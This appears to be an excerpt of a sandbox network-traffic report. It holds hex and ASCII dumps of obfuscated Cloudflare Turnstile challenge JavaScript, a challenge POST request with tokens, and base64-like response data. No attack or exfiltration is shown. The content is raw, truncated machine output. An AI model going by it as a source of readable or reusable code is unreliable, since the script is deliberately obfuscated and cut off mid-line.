                                        2025-01-08 23:45:53 UTC1369INData Raw: 66 56 2c 67 37 2c 67 64 2c 67 65 2c 67 66 2c 67 70 2c 67 41 2c 67 45 2c 65 57 2c 65 58 29 7b 66 6f 72 28 67 4a 3d 62 2c 66 75 6e 63 74 69 6f 6e 28 63 2c 64 2c 67 49 2c 65 2c 66 29 7b 66 6f 72 28 67 49 3d 62 2c 65 3d 63 28 29 3b 21 21 5b 5d 3b 29 74 72 79 7b 69 66 28 66 3d 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 33 31 29 29 2f 31 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 35 38 37 29 29 2f 32 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 37 36 34 29 29 2f 33 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 32 32 31 29 29 2f 34 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31 30 31 38 29 29 2f 35 2b 70 61 72 73 65 49 6e 74 28 67 49 28 31 33 30 38 29 29 2f 36 2b 2d 70 61 72 73 65 49 6e 74 28 67 49 28 34 34 33 29 29 2f 37 2a 28 2d 70 61 72 73 65 49 6e 74 28 67 49 28 31
                                        Data Ascii: fV,g7,gd,ge,gf,gp,gA,gE,eW,eX){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=-parseInt(gI(1531))/1+parseInt(gI(1587))/2+-parseInt(gI(764))/3+parseInt(gI(1221))/4+-parseInt(gI(1018))/5+parseInt(gI(1308))/6+-parseInt(gI(443))/7*(-parseInt(gI(1
                                        2025-01-08 23:45:53 UTC1369INData Raw: 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 27 77 74 63 42 72 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 2c 49 29 7b 72 65 74 75 72 6e 20 47 28 48 2c 49 29 7d 2c 27 52 52 4a 54 67 27 3a 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 7d 2c 6f 5b 67 51 28 31 30 37 37 29 5d 28 6e 75 6c 6c 2c 68 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 29 72 65 74 75 72 6e 20 6a 3b 66 6f 72 28 78 3d 65 54 28 68 29 2c 67 5b 67 51 28 31 30 32 36 29 5d 5b 67 51 28 31 30 36 38 29 5d 26 26 28 78 3d 78 5b 67 51 28 31 38 32 38 29 5d 28 67 5b 67 51 28 31 30 32 36 29 5d 5b 67 51 28 31 30 36 38 29 5d 28 68 29 29 29 2c 78 3d 67 5b 67 51 28 31 37 30 38 29 5d 5b 67 51 28 31 32 38 33 29 5d 26 26 67 5b 67 51 28 31 37 38 32 29
                                        Data Ascii: ':function(G,H){return G+H},'wtcBr':function(G,H,I){return G(H,I)},'RRJTg':function(G,H){return G+H}},o[gQ(1077)](null,h)||void 0===h)return j;for(x=eT(h),g[gQ(1026)][gQ(1068)]&&(x=x[gQ(1828)](g[gQ(1026)][gQ(1068)](h))),x=g[gQ(1708)][gQ(1283)]&&g[gQ(1782)
                                        2025-01-08 23:45:53 UTC1369INData Raw: 29 7d 29 7d 2c 65 57 3d 5b 5d 2c 65 58 3d 30 3b 32 35 36 3e 65 58 3b 65 57 5b 65 58 5d 3d 53 74 72 69 6e 67 5b 67 4a 28 31 35 34 33 29 5d 28 65 58 29 2c 65 58 2b 2b 29 3b 65 59 3d 28 30 2c 65 76 61 6c 29 28 67 4a 28 31 35 33 38 29 29 2c 65 5a 3d 61 74 6f 62 28 67 4a 28 31 32 36 36 29 29 2c 65 4d 5b 67 4a 28 31 32 34 33 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 4a 28 37 30 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 4d 29 7b 69 66 28 68 4d 3d 67 4a 2c 65 4d 5b 68 4d 28 31 32 34 33 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 4d 28 31 32 34 33 29 5d 3d 21 21 5b 5d 7d 2c 66 76 3d 30 2c 65 4e 5b 67 4a 28 31 37 30 36 29 5d 3d 3d 3d 67 4a 28 35 32 33 29 3f 65 4e 5b 67 4a 28 38 37 33 29 5d 28 67 4a 28 31 32 30 34 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f
                                        Data Ascii: )})},eW=[],eX=0;256>eX;eW[eX]=String[gJ(1543)](eX),eX++);eY=(0,eval)(gJ(1538)),eZ=atob(gJ(1266)),eM[gJ(1243)]=![],eM[gJ(700)]=function(hM){if(hM=gJ,eM[hM(1243)])return;eM[hM(1243)]=!![]},fv=0,eN[gJ(1706)]===gJ(523)?eN[gJ(873)](gJ(1204),function(){setTimeo
                                        2025-01-08 23:45:53 UTC1369INData Raw: 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 43 6e 4a 6d 75 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 73 45 6b 57 71 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 69 7d 2c 27 55 56 71 4d 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 21 3d 68 7d 2c 27 79 4e 79 57 63 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 27 46 61 64 44 65 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2b 69 7d 2c 27 74 73 4e 6f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 7d 2c 65 3d 53 74 72 69 6e 67 5b 69 31 28 31 35 34 33 29 5d 2c 66 3d 7b 27 68 27
                                        Data Ascii: ction(h,i){return h&i},'CnJmu':function(h,i){return i*h},'sEkWq':function(h,i){return h<i},'UVqMl':function(h,i){return i!=h},'yNyWc':function(h,i){return h*i},'FadDe':function(h,i){return h+i},'tsNoN':function(h,i){return i==h}},e=String[i1(1543)],f={'h'
                                        2025-01-08 23:45:53 UTC1369INData Raw: 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 78 2b 2b 29 3b 66 6f 72 28 4e 3d 44 5b 69 36 28 31 30 33 39 29 5d 28 30 29 2c 78 3d 30 3b 64 5b 69 36 28 31 32 39 36 29 5d 28 38 2c 78 29 3b 49 3d 64 5b 69 36 28 31 34 39 38 29 5d 28 49 2c 31 29 7c 4e 26 31 2e 33 37 2c 64 5b 69 36 28 37 31 30 29 5d 28 4a 2c 64 5b 69 36 28 31 33 35 34 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 69 36 28 31 36 36 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 65 6c 73 65 7b 66 6f 72 28 4e 3d 31 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 36 28 39 31 34 29 5d 28 49 2c 31 29 7c 4e 2c 64 5b 69 36 28 37 31 30 29 5d 28 4a 2c 6a 2d 31 29 3f 28 4a 3d 30 2c 48 5b 69 36 28 31 36 36 37 29 5d 28 64 5b 69 36 28 36 32 32 29 5d 28 6f
                                        Data Ascii: 7)](o(I)),I=0):J++,x++);for(N=D[i6(1039)](0),x=0;d[i6(1296)](8,x);I=d[i6(1498)](I,1)|N&1.37,d[i6(710)](J,d[i6(1354)](j,1))?(J=0,H[i6(1667)](o(I)),I=0):J++,N>>=1,x++);}else{for(N=1,x=0;x<G;I=d[i6(914)](I,1)|N,d[i6(710)](J,j-1)?(J=0,H[i6(1667)](d[i6(622)](o
                                        2025-01-08 23:45:53 UTC1369INData Raw: 69 36 28 31 32 39 36 29 5d 28 31 36 2c 78 29 3b 49 3d 64 5b 69 36 28 37 33 38 29 5d 28 49 3c 3c 31 2c 64 5b 69 36 28 39 33 34 29 5d 28 4e 2c 31 29 29 2c 4a 3d 3d 64 5b 69 36 28 35 37 32 29 5d 28 6a 2c 31 29 3f 28 4a 3d 30 2c 48 5b 69 36 28 31 36 36 37 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 4e 3e 3e 3d 31 2c 78 2b 2b 29 3b 7d 45 2d 2d 2c 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 69 36 28 39 32 35 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 2c 64 65 6c 65 74 65 20 43 5b 44 5d 7d 65 6c 73 65 20 66 6f 72 28 4e 3d 42 5b 44 5d 2c 78 3d 30 3b 78 3c 47 3b 49 3d 64 5b 69 36 28 31 37 35 30 29 5d 28 49 3c 3c 31 2c 64 5b 69 36 28 31 33 37 30 29 5d 28 4e 2c 31 29 29 2c 4a 3d 3d 6a 2d 31 3f 28 4a 3d 30 2c 48 5b 69 36 28 31 36 36 37 29 5d 28 6f 28 49 29 29 2c 49
                                        Data Ascii: i6(1296)](16,x);I=d[i6(738)](I<<1,d[i6(934)](N,1)),J==d[i6(572)](j,1)?(J=0,H[i6(1667)](o(I)),I=0):J++,N>>=1,x++);}E--,0==E&&(E=Math[i6(925)](2,G),G++),delete C[D]}else for(N=B[D],x=0;x<G;I=d[i6(1750)](I<<1,d[i6(1370)](N,1)),J==j-1?(J=0,H[i6(1667)](o(I)),I
                                        2025-01-08 23:45:53 UTC1369INData Raw: 69 66 28 49 3e 69 29 72 65 74 75 72 6e 27 27 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 39 28 39 32 35 29 5d 28 32 2c 43 29 2c 46 3d 31 3b 46 21 3d 4b 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 6f 28 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 39 28 31 34 38 36 29 5d 28 64 5b 69 39 28 37 38 32 29 5d 28 30 2c 4e 29 3f 31 3a 30 2c 46 29 2c 46 3c 3c 3d 31 29 3b 73 77 69 74 63 68 28 4f 3d 4a 29 7b 63 61 73 65 20 30 3a 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 69 39 28 39 32 35 29 5d 28 32 2c 38 29 2c 46 3d 31 3b 64 5b 69 39 28 39 30 32 29 5d 28 46 2c 4b 29 3b 4e 3d 47 26 48 2c 48 3e 3e 3d 31 2c 48 3d 3d 30 26 26 28 48 3d 6a 2c 47 3d 64 5b 69 39 28 36 32 32 29 5d 28 6f 2c 49 2b 2b 29 29 2c 4a 7c 3d 64 5b 69 39 28 37 34 32
                                        Data Ascii: if(I>i)return'';for(J=0,K=Math[i9(925)](2,C),F=1;F!=K;N=G&H,H>>=1,0==H&&(H=j,G=o(I++)),J|=d[i9(1486)](d[i9(782)](0,N)?1:0,F),F<<=1);switch(O=J){case 0:for(J=0,K=Math[i9(925)](2,8),F=1;d[i9(902)](F,K);N=G&H,H>>=1,H==0&&(H=j,G=d[i9(622)](o,I++)),J|=d[i9(742
                                        2025-01-08 23:45:53 UTC1369INData Raw: 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 69 63 28 39 33 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 5b 69 63 28 31 37 36 37 29 5d 3d 69 63 28 37 37 35 29 2c 6a 5b 69 63 28 31 35 33 30 29 5d 3d 69 63 28 39 33 30 29 2c 6a 5b 69 63 28 31 33 30 35 29 5d 3d 69 63 28 37 37 30 29 2c 6a 5b 69 63 28 31 38 37 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 47 2c 48 29 7b 72 65 74 75 72 6e 20 47 2b 48 7d 2c 6a 29 3b 74 72 79 7b 69 66 28 6c 3d 66 41 28 67 5b 69 63 28 31 35 31 38 29 5d 2c 67 5b 69 63 28 31 32 31 34 29 5d 29 2c 67 5b 69 63 28 31 35 31 38 29 5d 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 67 5b 69 63 28 31 35 31 38 29 5d 3d 4a 53 4f 4e 5b 69 63 28 31 31 30 38 29 5d 28 67 5b 69 63 28 31 35 31 38 29 5d 2c 4f
                                        Data Ascii: return G+H},j[ic(935)]=function(G,H){return G+H},j[ic(1767)]=ic(775),j[ic(1530)]=ic(930),j[ic(1305)]=ic(770),j[ic(1874)]=function(G,H){return G+H},j);try{if(l=fA(g[ic(1518)],g[ic(1214)]),g[ic(1518)]instanceof Error?g[ic(1518)]=JSON[ic(1108)](g[ic(1518)],O


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        14192.168.2.1649733104.18.94.414432916C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2025-01-08 23:45:53 UTC1170OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/983776855:1736379108:IMxQVsLwXGlZd6n2Z41p0MdEOBPL-IrpzZlTwr2AUq0/8ff01048fb6d4364/R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        Content-Length: 3312
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        Content-type: application/x-www-form-urlencoded
                                        CF-Chl-RetryAttempt: 0
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        CF-Challenge: R_rTQntoF2VLgYZkDUVyN5HYUuUJHQ5sQpdDYboamyI-1736379951-1.1.1.1-8HJ56pYygoOERHrUddPOUm5UWJPLWIxfd21ZbdJVLTboWU.17jbFjn_jHtL9eDOz
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Origin: https://challenges.cloudflare.com
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/sr46z/0x4AAAAAAA4FpD7uVAQN4KLZ/auto/fbE/normal/auto/
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2025-01-08 23:45:53 UTC3312OUTData Raw: 76 5f 38 66 66 30 31 30 34 38 66 62 36 64 34 33 36 34 3d 56 54 78 58 4c 58 41 58 55 58 51 58 34 6e 32 46 6e 32 47 58 6e 39 70 48 38 4a 6e 35 32 38 74 6b 32 62 47 32 42 24 53 42 46 33 38 32 70 39 38 48 44 53 33 41 32 47 32 78 39 6e 4e 42 36 32 4b 53 32 48 44 68 4e 58 35 44 32 67 58 6e 44 4e 6e 43 45 6a 42 4e 32 71 58 45 45 7a 32 25 32 62 53 32 55 2b 32 78 39 32 5a 32 38 2d 49 32 79 45 61 76 35 32 38 72 64 58 42 62 4b 30 53 32 66 32 4d 46 45 32 4f 2d 4b 50 62 67 67 6a 4f 30 49 66 79 6b 36 49 4c 45 32 31 4a 4b 32 56 59 52 41 43 53 42 56 56 33 55 35 75 45 4a 67 6d 33 6e 54 2d 39 56 6b 4d 34 55 79 4e 4d 33 2d 43 50 73 69 61 53 42 34 76 44 4b 32 6d 47 53 32 42 2b 39 32 48 43 36 31 32 45 4e 79 2b 24 32 73 32 45 4b 32 6a 2d 43 53 58 6e 37 39 62 70 58 32 70 53 32
                                        Data Ascii: v_8ff01048fb6d4364=VTxXLXAXUXQX4n2Fn2GXn9pH8Jn528tk2bG2B$SBF382p98HDS3A2G2x9nNB62KS2HDhNX5D2gXnDNnCEjBN2qXEEz2%2bS2U+2x92Z28-I2yEav528rdXBbK0S2f2MFE2O-KPbggjO0Ifyk6ILE21JK2VYRACSBVV3U5uEJgm3nT-9VkM4UyNM3-CPsiaSB4vDK2mGS2B+92HC612ENy+$2s2EK2j-CSXn79bpX2pS2
                                        2025-01-08 23:45:53 UTC759INHTTP/1.1 200 OK
                                        Date: Wed, 08 Jan 2025 23:45:53 GMT
                                        Content-Type: text/plain; charset=UTF-8
                                        Content-Length: 152828
                                        Connection: close
                                        cf-chl-gen: cXTANPgY/wbBQCsude9VFN8BtJARjRCRfCSgalI/eWAhW+XBhDmE3nfIUyPUNsl6ymhnx7SftRuO2F8tJ7gEh7BLoRmgC0u3TPgZzjSLuOzeBk43j+3ocpNe9FiSce5e152Uhcy989HwG1E1+fA8PHFrKxsqYeAHWLnAvFuilq8jne/yb1rtPMtE2c1mVEcSSP1fB/e0Dlc3yjNDmdEyhfGMpPIIZC4aseWDBzDFev0u706cUozgvgeAlcJlevVITuVjhe+yAdZ/cwtD/oigkXX4RKccq5hcD7/CuvguDxvNDy3505bcrFUS73vuk2NgRQMK+3khQgfHBDEpvmISAP9MhrnutI08cUUIa7SRptjwJPDkF4ugSd+ZoW8u4y5BSE2StK3OND5NFywKvKMgiEqlVdLQPWkzU24HvxstIKm6VwggaUZmzlxHH2EI2YaOkAMatT1dpYLabVcGweX70rcp8b9rIQAtA2p1cDd9Z7JlKP51DnHED+6VAg==$3WLER6GzjRpWqtsh
                                        Server: cloudflare
                                        CF-RAY: 8ff01053bd6b8c57-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2025-01-08 23:45:53 UTC610INData Raw: 69 47 52 7a 62 58 64 6f 61 6d 36 4d 57 4a 57 4e 66 6d 6d 49 69 34 4f 41 65 58 75 45 63 32 43 63 65 58 69 71 69 61 4e 6e 67 59 69 4e 70 5a 4b 51 68 61 56 34 6f 58 65 44 6d 4c 4b 47 72 5a 75 39 65 35 47 7a 78 63 4b 54 79 4c 53 36 71 72 53 58 7a 73 6d 43 70 36 4f 6d 6b 73 57 4e 30 62 61 50 70 36 32 31 6e 4e 75 72 74 5a 72 4f 73 37 6d 69 31 4b 48 66 35 4e 58 68 34 62 76 63 77 38 43 76 36 74 47 73 39 65 37 56 73 4c 54 6e 7a 65 2b 35 37 4d 2f 61 41 4d 71 36 7a 67 62 53 7a 2b 44 65 31 77 72 43 33 2b 49 4c 43 65 2f 6b 78 51 6f 42 30 42 4d 4f 42 64 58 78 43 52 54 35 45 2b 41 51 2b 78 58 6b 39 51 59 44 38 76 33 32 35 75 6b 75 42 43 6a 69 4a 4f 76 73 41 7a 41 74 49 42 4d 76 4d 6a 51 4b 2b 54 51 68 2f 53 4c 2b 49 54 51 54 4d 54 67 2f 46 7a 4d 33 46 53 67 76 4f 51 74
                                        Data Ascii: iGRzbXdoam6MWJWNfmmIi4OAeXuEc2CceXiqiaNngYiNpZKQhaV4oXeDmLKGrZu9e5GzxcKTyLS6qrSXzsmCp6OmksWN0baPp621nNurtZrOs7mi1KHf5NXh4bvcw8Cv6tGs9e7VsLTnze+57M/aAMq6zgbSz+De1wrC3+ILCe/kxQoB0BMOBdXxCRT5E+AQ+xXk9QYD8v325ukuBCjiJOvsAzAtIBMvMjQK+TQh/SL+ITQTMTg/FzM3FSgvOQt
                                        2025-01-08 23:45:53 UTC1369INData Raw: 77 6f 57 6d 41 37 57 56 78 56 51 31 6f 7a 55 45 52 45 4f 7a 31 6e 4a 45 45 75 55 6a 31 64 61 6a 35 66 55 6a 46 30 53 57 31 32 50 57 74 56 67 57 70 52 62 33 5a 2f 57 6d 56 33 64 33 68 65 57 6d 61 47 62 56 78 44 58 6d 6d 41 67 48 2b 42 67 59 4f 48 54 59 31 35 56 48 74 71 65 47 4a 32 59 4a 32 6a 6b 6e 70 34 64 6e 74 31 61 59 6d 47 6e 36 65 72 68 71 56 31 61 4b 47 5a 73 4c 47 4d 72 48 69 4d 6d 49 43 78 75 4a 65 6b 6f 4b 53 45 70 5a 65 4b 6f 35 54 45 76 4c 43 65 76 37 37 53 73 62 32 6e 72 4e 4f 6a 6b 63 57 37 6c 72 71 2b 72 72 57 78 72 64 69 2f 74 38 69 6b 77 38 62 55 76 4e 33 65 31 38 37 52 71 63 32 2b 31 65 48 6d 39 4d 37 75 77 2f 75 76 36 66 7a 31 39 72 7a 68 7a 64 2f 77 41 38 44 63 32 41 62 6f 44 2f 67 4a 33 67 37 4b 42 50 37 32 42 4f 67 54 37 67 2f 72 31
                                        Data Ascii: woWmA7WVxVQ1ozUEREOz1nJEEuUj1daj5fUjF0SW12PWtVgWpRb3Z/WmV3d3heWmaGbVxDXmmAgH+BgYOHTY15VHtqeGJ2YJ2jknp4dnt1aYmGn6erhqV1aKGZsLGMrHiMmICxuJekoKSEpZeKo5TEvLCev77Ssb2nrNOjkcW7lrq+rrWxrdi/t8ikw8bUvN3e187Rqc2+1eHm9M7uw/uv6fz19rzhzd/wA8Dc2AboD/gJ3g7KBP72BOgT7g/r1
                                        2025-01-08 23:45:53 UTC1369INData Raw: 66 4e 6b 5a 65 59 6d 56 54 59 47 67 32 57 55 77 36 59 57 30 39 55 6e 56 53 56 33 63 77 57 6c 67 37 63 44 68 78 66 33 69 41 64 45 31 34 67 6e 39 32 68 46 31 55 53 59 4b 44 56 30 79 4d 66 70 53 44 54 32 2b 51 63 49 71 4d 65 46 70 6d 63 6e 4e 75 59 58 64 34 65 49 39 65 67 33 74 70 6c 5a 53 42 6a 6e 71 46 62 32 36 73 71 6e 36 66 6b 34 65 5a 63 48 43 53 74 5a 6d 7a 6b 58 31 7a 6c 37 61 63 6e 6e 2f 42 6b 71 47 34 79 38 57 31 76 6f 47 73 76 61 47 73 6f 63 43 53 72 71 62 47 78 4e 6e 48 33 4e 44 57 72 37 71 66 32 70 62 41 33 4e 58 6a 6f 64 7a 63 33 72 71 2b 70 74 47 38 30 4f 44 66 36 38 71 31 35 2b 2f 36 31 62 62 46 75 65 33 30 2b 4f 44 73 7a 39 37 33 42 4f 4c 63 35 76 37 66 31 63 7a 6f 77 67 4c 78 45 63 7a 31 34 42 50 7a 36 4f 6a 6a 42 76 30 48 38 51 2f 7a 43 2b
                                        Data Ascii: fNkZeYmVTYGg2WUw6YW09UnVSV3cwWlg7cDhxf3iAdE14gn92hF1USYKDV0yMfpSDT2+QcIqMeFpmcnNuYXd4eI9eg3tplZSBjnqFb26sqn6fk4eZcHCStZmzkX1zl7acnn/BkqG4y8W1voGsvaGsocCSrqbGxNnH3NDWr7qf2pbA3NXjodzc3rq+ptG80ODf68q15+/61bbFue30+ODsz973BOLc5v7f1czowgLxEcz14BPz6OjjBv0H8Q/zC+
                                        2025-01-08 23:45:53 UTC1369INData Raw: 4a 46 51 74 5a 6d 39 6d 59 6a 39 62 50 6c 52 41 56 57 38 34 54 7a 56 72 54 6e 6c 2f 63 47 74 68 51 6b 79 45 68 56 78 61 63 58 5a 65 5a 45 74 4d 66 6b 5a 78 59 49 43 54 54 4a 57 4b 63 49 4e 78 6a 47 70 5a 6c 57 78 70 66 58 35 2f 70 4b 53 55 64 71 4e 38 6f 4b 79 62 72 71 74 74 6b 57 32 4c 6f 4b 4e 75 73 4a 4b 74 6c 6e 61 51 70 48 53 54 75 4c 47 42 6d 4b 32 6a 74 35 62 43 70 38 6e 48 76 4d 61 70 75 61 47 4a 6f 4a 2f 51 6b 38 79 68 30 34 72 57 78 61 33 63 72 4d 32 33 75 4c 44 64 34 74 69 7a 75 4c 7a 70 34 39 66 73 36 64 33 66 75 4e 79 35 37 39 4f 76 74 64 58 67 74 39 54 72 31 73 33 72 37 37 6a 39 30 4d 7a 4e 77 38 43 2b 38 63 4d 43 39 66 66 2b 31 77 55 46 35 74 2f 63 43 75 73 4d 30 65 34 57 46 68 72 55 46 50 33 35 39 4f 44 71 49 76 66 6a 4a 53 55 69 35 76 6e
                                        Data Ascii: JFQtZm9mYj9bPlRAVW84TzVrTnl/cGthQkyEhVxacXZeZEtMfkZxYICTTJWKcINxjGpZlWxpfX5/pKSUdqN8oKybrqttkW2LoKNusJKtlnaQpHSTuLGBmK2jt5bCp8nHvMapuaGJoJ/Qk8yh04rWxa3crM23uLDd4tizuLzp49fs6d3fuNy579OvtdXgt9Tr1s3r77j90MzNw8C+8cMC9ff+1wUF5t/cCusM0e4WFhrUFP359ODqIvfjJSUi5vn
                                        2025-01-08 23:45:53 UTC1369INData Raw: 47 46 70 53 7a 31 53 64 57 45 76 57 56 78 30 65 48 6c 79 63 31 51 39 4f 6b 77 2b 56 31 5a 57 67 48 32 4b 52 32 68 39 5a 6c 68 64 66 58 35 77 61 56 39 57 68 56 68 58 56 5a 70 30 63 46 57 52 6c 33 2b 53 6b 58 31 36 6c 49 46 6f 6f 35 36 71 69 47 65 4b 62 71 4f 65 63 59 43 78 64 59 52 32 70 49 78 33 65 70 43 4b 71 61 6a 41 6e 4c 65 63 75 48 36 68 71 4b 53 62 76 72 53 72 6d 35 75 34 69 5a 76 4b 73 37 4b 70 73 73 62 52 72 61 79 54 76 70 53 37 32 4e 2b 67 32 4a 33 68 31 38 4f 66 31 65 66 54 70 64 62 4a 34 71 33 62 73 4d 2b 72 70 2b 58 78 31 63 54 53 35 63 58 48 75 76 34 42 38 74 54 58 37 62 2f 62 78 66 33 2b 31 77 7a 34 78 4d 44 67 34 38 7a 71 45 41 62 30 41 41 73 47 36 75 77 4e 43 74 73 63 35 78 44 64 33 77 48 68 2f 68 66 2b 47 66 63 49 39 43 72 66 41 78 6b 6b
                                        Data Ascii: GFpSz1SdWEvWVx0eHlyc1Q9Okw+V1ZWgH2KR2h9ZlhdfX5waV9WhVhXVZp0cFWRl3+SkX16lIFoo56qiGeKbqOecYCxdYR2pIx3epCKqajAnLecuH6hqKSbvrSrm5u4iZvKs7KpssbRrayTvpS72N+g2J3h18Of1efTpdbJ4q3bsM+rp+Xx1cTS5cXHuv4B8tTX7b/bxf3+1wz4xMDg48zqEAb0AAsG6uwNCtsc5xDd3wHh/hf+GfcI9CrfAxkk
                                        2025-01-08 23:45:53 UTC1369INData Raw: 6c 4b 5a 7a 46 6f 65 58 56 75 4f 44 68 38 56 6c 39 37 5a 55 46 5a 64 46 31 31 51 6f 61 41 58 32 6c 79 6b 58 2b 47 68 6f 74 67 68 48 47 44 66 46 61 59 6e 33 31 66 62 4a 61 4d 67 34 46 2b 70 49 53 43 6d 34 43 69 72 49 71 4a 6d 36 4a 38 6e 49 61 4d 6f 34 4f 34 70 34 68 31 68 6d 2b 58 69 6e 61 52 6f 35 43 5a 74 35 2f 42 6f 5a 69 37 79 4b 61 6e 72 4b 71 69 68 37 76 47 76 4b 69 4d 7a 73 4f 58 77 37 62 4a 31 70 6a 53 79 38 33 6a 72 74 65 74 34 4e 61 31 75 4d 57 37 35 75 36 2f 32 4e 48 47 72 63 37 6d 36 2b 72 41 31 2b 58 51 73 66 50 39 39 4d 7a 32 32 72 6e 4f 74 72 2f 32 36 4f 58 30 39 73 58 62 79 63 6b 50 42 2f 33 66 7a 76 4d 56 37 75 49 56 36 39 55 52 30 78 33 65 44 65 37 54 36 76 34 68 33 42 51 6c 47 4f 49 6d 46 77 62 34 42 2b 59 4f 41 42 41 68 4c 75 66 2b 49
                                        Data Ascii: lKZzFoeXVuODh8Vl97ZUFZdF11QoaAX2lykX+GhotghHGDfFaYn31fbJaMg4F+pISCm4CirIqJm6J8nIaMo4O4p4h1hm+XinaRo5CZt5/BoZi7yKanrKqih7vGvKiMzsOXw7bJ1pjSy83jrtet4Na1uMW75u6/2NHGrc7m6+rA1+XQsfP99Mz22rnOtr/26OX09sXbyckPB/3fzvMV7uIV69UR0x3eDe7T6v4h3BQlGOImFwb4B+YOABAhLuf+I
                                        2025-01-08 23:45:53 UTC1369INData Raw: 36 55 34 45 36 56 31 36 42 50 6d 4e 54 69 48 31 64 59 31 31 47 5a 49 31 4f 6b 4a 43 43 56 48 42 31 56 49 35 6a 62 6f 6d 47 69 6d 6c 32 63 61 47 51 67 47 4f 57 6d 6d 43 6b 5a 36 6c 6b 6d 33 68 2b 71 6e 32 65 67 36 4b 55 67 49 69 6c 64 49 65 33 71 33 65 58 74 70 2b 34 75 62 65 78 6f 49 52 2f 74 72 71 34 69 4b 61 59 77 63 6d 70 77 38 43 54 71 59 37 42 71 36 32 51 32 73 33 59 70 62 6a 61 32 74 4c 66 35 4f 47 77 32 37 50 6a 75 38 66 67 77 39 36 6b 72 4e 33 4d 37 4b 76 4f 39 74 66 73 30 74 58 31 78 64 50 4c 2f 63 37 58 7a 65 37 77 76 64 37 41 33 62 6f 49 2f 41 6b 48 44 4e 6e 42 7a 75 73 46 35 64 7a 64 43 51 54 68 79 39 51 64 35 76 54 74 33 4f 73 67 38 76 44 69 49 2b 54 65 35 53 48 6d 43 79 51 6d 49 42 73 6f 45 79 4d 76 45 67 6b 45 4d 52 66 76 4c 51 67 76 2b 68
                                        Data Ascii: 6U4E6V16BPmNTiH1dY11GZI1OkJCCVHB1VI5jbomGiml2caGQgGOWmmCkZ6lkm3h+qn2eg6KUgIildIe3q3eXtp+4ubexoIR/trq4iKaYwcmpw8CTqY7Bq62Q2s3Ypbja2tLf5OGw27Pju8fgw96krN3M7KvO9tfs0tX1xdPL/c7Xze7wvd7A3boI/AkHDNnBzusF5dzdCQThy9Qd5vTt3Osg8vDiI+Te5SHmCyQmIBsoEyMvEgkEMRfvLQgv+h
